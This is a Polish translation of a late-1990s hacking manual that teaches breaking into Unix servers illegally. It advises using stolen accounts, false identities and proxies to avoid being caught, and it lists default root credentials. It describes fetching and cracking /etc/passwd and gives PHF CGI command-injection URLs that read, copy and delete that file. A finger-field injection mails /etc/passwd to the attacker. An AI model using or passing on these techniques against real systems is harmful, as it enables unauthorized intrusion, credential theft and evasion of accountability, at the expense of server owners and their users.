podręcznik hacku
Stworzone przez Overlord, © Czerw, 1998. Tłumaczenie PHIRO Wrz. 2000 i Kobi Gru. 2000 (modyfikowany przez b0r4sk4t3 & Kobi). Najnowsza wersja dostępna zawsze na http://www.cyberarmy.com.
WPROWADZENIE
Potrzebne jest małe wprowadzenie zanim przejdziemy do technik hackingu.
Więc mówimy o hackingu, kiedy ktoś dostanie się do serwera do którego nie powinien. Serwery są tak skonfigurowane aby wiele osób mogło z nich korzystać. Ci ludzie mają różne konta na serwerze - jakby różne katalogi, które do nich należą. Jeśli Fred ma konto na "costam.com" to otrzyma:
--> login, który jest także nazwą jego katalogu
--> hasło, które daje mu dostęp do tego katalogu.
Ten Login i Hasło dają ci przeważnie dostęp do wszystkich usług z jakich może korzystać np.: "Fred". Jego poczta, listy dyskusyjne i strony www. Jest także konto root'a, z osobnym Loginem i Hasłem. To daje super-user'a. Wyjaśnimy jak zdobyć root'a, w tym podręczniku.
ANATOMIA ATAKU
Są dwie drogi aby włamać się do jakiegoś systemu. Możesz spróbować dostać się do środka próbując odgadnąć kombinację. To jak gdyby szukanie hasła. Drugą drogą jest użycie dynamitu. Zapomnij o możliwości legalnego dostania się tam. To jak używanie exploitów albo błędów w systemie aby wejść.
NIE DAJ SIĘ ZŁAPAĆ #1
Hack jest nie legalny, i można cię łatwo namierzyć jeśli dowiedzą się że ich zhackowałeś. Gdziekolwiek pójdziesz, twój numer IP (Unikalny identyfikator twojego komputera) Zostaje zapisany w logach. Porada:
1. Gdy ustalasz połączenie z dostawcą usług internetowych podaj fałszywe dane (nie dotyczy Polski, jeśli łączysz się przez tpSA za każdym razem dostajesz inny IP, ale i tak uważaj)
NIE DAJ SIĘ ZŁAPAĆ #2
2. Hackuj używając czyichś kont (ukradzione hasła itp.). Narzędzie zwane Dripper Potrafi ukraść hasła z kawiarenek internetowych i bibliotek.
NIE DAJ SIĘ ZŁAPAĆ #3
3. Przekieruj swoje połączenie przez kogoś innego.
Jest to bardzo łatwe wystarczy zmienić swoje ustawienia proxy. Używając tego sposobu będziesz zostawiał adres serwera przez który się łączysz a nie swój. Listę serwerów znajdziesz tutaj.
Powinieneś na wszelki wypadek ukryć swój IP używając apletu z Cyberarmy.Com
Jeśli chcesz być super anonimowy powinieneś łączyć się z konta pod fałszywym nazwiskiem, ze zmienionym proxy, i apletem maskującym twój IP!
ZBIERANIE INFORMACJI
Najpierw trzeba zebrać trochę informacji o www.costam.com używając pewnych zabawek.
FAZA BRUDNEGO KOPANIA
Przejdźmy do pierwszego kroku podczas każdego hackowania... zbierania informacji.
Powinieneś być niewykrywalny. Włącz jakiś notatnik i uruchom przeglądarkę www (przez aplet). Wejdź na stronę www.
SPRAWDZANIE
Obejrzyj sobie stronę. Pozbieraj adresy e-mail, skopiuj HTML ważnych stron. ]
STARY TRICK Z ODBICIEM MAILA
Wyślij maila który zostanie odbity do ciebie, jeśli adres to www.costam.com, wyślij maila na blahblahblah@costam.com. Zostanie odbity i przyniesie ciekawe wiadomości w nagłówku.
Skopiuj je.
(Żeby zachować maxymalną anonimowość należało by wysłać mail z konta serwera który ma tak wielką liczbę użytkowników że nie będzie można cię zidentyfikować <dla Polaka najlepszy będzie hotmail.com>. Bądź anonimowy wysyłając tego maila. To cię uchroni kiedy sprawdzą po ataku logi.)
TRACEROUTE
Ciągle bądź anonimowy, zrób Traceroute. Ten Traceroute dostępny jest dzięki Hacker Home Page pochodzi z działu net tools.
To powinno pokazać ci jakie komputery znajdują się w sieci razem z ewentualnie ich providera.
Początek formularza
WHOIS
Ciągle bądź anonimowy, użyj opcji Whois na stronie. Whois pochodzi z Hacker home Page.
To da ci informację o właścicielach strony i serwerach na których ona się znajduje. Przepisz to.
Początek formularza
FINGER
Teraz na stronie użyj fingera. Użyj tego finger'a z cyberarmy.com aby sprawdzić stronę. Najpierw spróbuj 'finger@costam.com'. To czasami poda ci nazwy wszystkich kąt na serwerze. Jeśli to nie pomoże spróbuj na jakimś adresie e-mail jaki znalazłeś na stronie, i przez Whois. To czasami daje kilka przydatnych informacji.
Początek formularza
@
SKANOWANIE PORTÓ
Czas na skanowanie portów.
Skanowanie portów pokazuje wszystkie otwarte porty danego IP. Jest to bardzo użyteczne, ale daje znak właścicielowi maszyny że właśnie są hackowani. A więc nie skanuj portów danej strony dopóki nie jesteś pewien że chcesz ją zhackować.
Trudno ukryć skanowanie portów ale jest kilka skanerów w miarę "cichych". Większość pod Linuxa/Unixa. Więc Exploit Generator pod windows jest w miarę niewykrywalny. Więc jeśli chcesz wejść na bardzo zabezpieczoną stronę to zapomnij o skanowaniu portów dopóki nie masz linuxa.
Skanowanie powie ci wszystko na temat usług uruchomionych na stronie. Jeśli port 21 jest otwarty, to znaczy że mają serwer FTP, a jeśli 23 to znaczy, że mają telnet.
TELNET #1
Celem telnetowania się na stronę jest ustalenie jakiego systemu operacyjnego używają. Możesz użyć anonimowego telnetu z Cyberarmy.Com.
Telnetuj się na port 23. Przeważnie jeśli adres jest 'www.costam.com', spróbuj na 'costam.com'. Jeśli to nie działa to spróbuj na telnet albo cokolwiek co otrzymałeś dzięki Whois. Jeśli dostaniesz się zapisz jakie informacje otrzymasz.
TELNET #2
Zmień port na 21. To wyśle cię na port 21 czyli telnet. Jeśli działa napisz SYST aby znaleźć to czego szukasz.
TELNET #3
Teraz jeśli masz szczęście spróbuj na 80, port HTTP. Zanotuj jeśli da ci to jakieś informacje.
LAMERSKIE PROGRAMY
Musisz znać typ serwera jeśli naprawdę chcesz go zhackować. Jak chcesz użyć exploitów jeśli nie będziesz mógł ich skonfigurować dla danego systemu, albo znaleźć.
Ostatnia szansa to uruchomić program Whats Running? Nie działa zawsze dobrze ale powinien dać ci typ serwera, może cię także zalogować na serwer ofiary.
Jeśli to nie działa to spróbuj zrobić cokolwiek aby znaleźć typ serwera. Chociaż by napisać maila i zapytać jakiego systemu operacyjnego używają....
ZNALEZIENIE HASŁA (OD FRONTU)
Spróbujemy wejść przez frontowe drzwi serwera. Według naszego to ku myślenia spróbujemy odgadnąć hasło.
PIERWSZA RZECZ
Możesz spędzić całe tygodnie próbując zaawansowanych technik z exploitami podszywaniem pod IP i Social Enginering żeby znaleźć to co otrzymamy wpisując:
$Login: root
$Password: root
Spróbujmy na początek łatwej drogi. Unix ma ustawione pewne hasła fabrycznie i często nie są one zmieniane, więc telnetuj się na.
Nie używaj normalnego telnetu bo to pokaże twój IP. Z proxy i anonimowym telnetem zacznij pracę.
Spróbuj następujących kombinacji:
login : passwd
root : root
sys : sys/system/bin
bin : sys/bin
mountfs : mountfsys
adm : adm
uucp : uucp
nuucp : anon
anon : anon
user : user
games : games
install : install
demo : demo
umountfsys : umountfsys
sync : sync
admin : admin
guest : guest
daemon : daemon
Konta root, mountfsys, umountfsys, install, i czasami sync są na poziomie root'a, to znaczy mają pełną moc. Inne są na poziomie zwykłego użytkownika.
UŻYWANIE LOGIN'ÓW
Wciąż łatwe rzeczy na początek. Przynajmniej 1 na 20 osób jest na tyle głupia żeby mieć takie samo hasło jak login. Z listą wszystkich maili i informacji o fingerze, spróbuj odgadywania haseł.
Dla przykładu, jeżeli koleś ma adres fred@costam.com, spróbuj zalogować się (przez telnet czy FTP) jako:
$Login: Fred
$Password: Fred
Spróbuj w ten sposób ze wszystkimi nazwami który wyciągnąłeś - może ci się poszczęści.
Czy to działa?
WYCIĄGANIE PLIKU Z HASŁAMI
Prawdopodobnie nie miałeś szczęścia do tej pory. Właściwie, większość hakerskich technik ma tylko niewielkie szanse powodzenia. Po prostu próbujesz aż do skutku.
Zakładając, że próbowałeś się zalogować na jakiegoś Unix'a, zapewne zastanawiałeś się jak system sprawdza poprawność haseł. Jest taki plik o nazwie 'passwd' na każdym Unix'ie w którym są przechowywane wszystkie hasła użytkowników. Więc, jeśli nie znasz prawdziwego hasła, spróbujemy je wyciągnąć i złamać.
STAROŻYTNA CHIŃSKA METODA NA FTP
Twoja przeglądarka powinna być ustawiona do obsługi fałszywych proxy. Będziemy używać tą przeglądarkę do FTP, ponieważ nie można jej tak łatwo wytropić, podczas gdy np: CuteFTP można wytropić bo nie używa serwerów proxy. Jeżeli po skanowaniu portów, znalazłeś otwarty port 21, to znaczy że jest duża szansa że jest na nim serwer FTP.
Używając 'niewidzialnej' przeglądarki, spróbuj się połączyć z FTP (np.: ftp://costam)
Jeżeli to nie działa, spróbuj ftp://ftp.costam
Jeżeli to nie da pożądanego skutku, spróbuj FTP na DNS (Domain Name Servers) które otrzymałeś przez szukanie 'WHOIS' (np.: ftp://ns1/).
STAROŻYTNA CHIŃSKA METODA #2
Teraz, gdy jesteś połączony z serwerem FTP przejdź do katalogu \etc. Powinieneś zobaczyć plik 'passwd' i możliwe 'group'. Skopiuj 'passwd' i obejrzyj go. Jeżeli wygląda w ten sposób po otwarciu, to znaczy że masz szczęście:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
Wiemy, że użytkownik "kangaroo" ma zaszyfrowane hasło "3A62i9qr", ale to nie jest właściwe hasło tylko zaszyfrowana forma jego hasła.
A może wygląda w ten sposób:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Jeżeli drugie pole jest zastąpione przez '*' lub 'x' to znaczy że hasło jest shadowowane i hasło nie może być odkodowane. Tak jest z większością haseł obecnie. Jednakże, jeżeli masz 'passwd' który posiada hasła nie shadowowane, możesz spróbować je odkodować (np: John The Ripper).
ROZKODOWYWANIE PLIKÓW Z HASŁAMI
Jest kilka programów, które zostały napisane specjalnie po to aby rozkodować pliki z hasłami. Najbardziej znany to chyba 'Cracker Jack'. Wiele tekstów o hacku poleca ten program - ale przeważnie są do kitu. Jest to program stary i większość systemów 'sypie' się zaraz po jego uruchomieniu, bo używa dziwnej elokacji pamięci.
Najlepszym programem do tego celu jest 'John the Ripper'. Został napisany całkiem niedawno i jest dużo szybszy niż 'Cracker Jack' kiedykolwiek. 'John the Ripper' był napisany pod kątem procesorów Pentium, a użyta technika 'brute force' jest genialna. Ale (niestety) trzeba użyć DOS'a żeby go uruchomić, chociaż ostatnio pojawiła się wersja pod Linux'a.
Będziesz także potrzebował dużego 'słownika'. Im większy, tym lepszy. Programy jak 'John' czy 'Jack' sprawdzają każde słowo do znalezienia hasła. Jeżeli 'słownik' jest dostatecznie duży, to masz duże szanse na znalezienie hasła.
STARA TECHNIKA PHF
Mimo że większość serwerów ma program 'PHF', upewnijmy się... To działa, pozwala zdobyć plik z hasłami, nawet jeśli jest ukryty a tylko 'root' ma dostęp do katalogów.
W "Overlord Anonymizerze" wpisz:
http://www.costam.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.costam.com/cgi-bin/php.cgi?/etc/passwd
http://www.costam.com/~root/etc/passwd
http://www.costam.com/~bin/etc/passwd
http://www.costam.com/projects/archeo/wwwboard
http://www.costam.com/_vti_prt/service.pwd
http://www.costam.com/~user/_vti_prt/service.pwd
http://www.costam.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.costam.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://www.costam.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd%0A&Qalias=&Qname=haqr&Qemail=
&Qnickname=&Qoffice_phone=
http://www.costam.com/~someuser/passwd
http://www.costam.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
Początek formularza
OVERLORD ANONYMIZER
Dół formularza
Jeśli PHF jest aktywny (a przeważnie nie jest), zobaczysz plik 'etc/passwd' w swojej przeglądarce. Potem wystarczy już tylko go zapisać i uruchomić program rozkodowywujący na ten plik.
Teraz gdy zobaczysz słowa 'Uśmiechnij się! Jesteś w Ukrytej Kamerze!', to znaczy że serwer jest zabezpieczony przeciw włamaniom i ma twój IP. Ale nie martw się. Jeżeli użyłeś anonymizera, jesteś bezpieczny.
HACZENIE ZA POMOCĄ FINGER'A
Serwery z finger'em są przyjaciółmi hackerów. Sprawdźmy czy serwer, który nas interesuje, ma aktywnego finger'a.
W Anonymizerze, wpisz www.costam.com/cgi-bin/finger, zakładając że nazwa zaczyna się od "www".
Początek formularza
OVERLORD ANONYMIZER
Dół formularza
Jeżeli serwer posiada aktywnego finger'a, powinno się pojawić okno, w którym możesz wpisać nazwę użytkownika, o którym chcesz się czegoś dowiedzieć. Masz także szansę na zdobycie pliku z hasłami (etc/passwd).
Ok, po pierwsze sporządź listę wszystkich adresów (e-mail) jakie zalazłeś na danej stronie (dla przykładu przyjmijmy, że jeden z nich to 'kangaroo@costam.com', a twój to 'ty@email.org')
Po drugie cofnij się do okna z finger'em i w polu gdzie masz wpisać nazwę użytkownika wpisz to (zamieniając te adresy na prawdziwe):
kangaroo@costam.com ; /bin/mail ty@email.org < etc/passwd
To spowoduje wysłanie pliku z hasłami przez 'kangaroo@costam.com' do ciebie. Jeżeli to zadziała to masz 'etc/passwd' w swojej skrzynce odbiorczej... Teraz wystarczy uruchomić John'a i zabawić się ich kosztem.
GRATULACJE
Uzyskałeś dostęp.
Teraz gdy masz login i hasło, możesz używać poczty, skorzystać z przywilejów FTP (zmienić czyjąś stronę) i skorzystać z HTTP.
(Jeżeli masz dostęp tylko jako zwykły user, nie rozpaczaj. Jeśli nie zdobyłeś root'a tylko normalne konto, to później jest już łatwiej zdobyć root'a. Więcej informacji - niedługo).